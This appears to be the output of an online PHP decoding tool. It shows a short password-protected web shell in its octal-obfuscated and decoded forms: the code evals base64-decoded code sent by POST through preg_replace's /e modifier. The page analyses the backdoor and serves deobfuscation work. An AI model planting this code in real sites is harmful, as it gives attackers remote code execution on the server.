Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (md5($_POST["password"]) == "c4d71025192058c12856041aca030975") { preg_replace("\..
Decoded Output download
<?php if (md5($_POST["password"]) == "c4d71025192058c12856041aca030975") { preg_replace("#.*#e", "eval(base64_decode('" . $_POST["code"] . "'));", ""); } ?>
Did this file decode correctly?
Original Code
<?php if (md5($_POST["password"]) == "c4d71025192058c12856041aca030975") { preg_replace("\043\056\052\043\145", "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050'" . $_POST["code"] . "'\051\051\073", ""); } ?>
Function Calls
md5 | 1 |
preg_replace | 1 |
Stats
MD5 | 8657f2307948d4c38fc7408999f9a75f |
Eval Count | 1 |
Decode Time | 86 ms |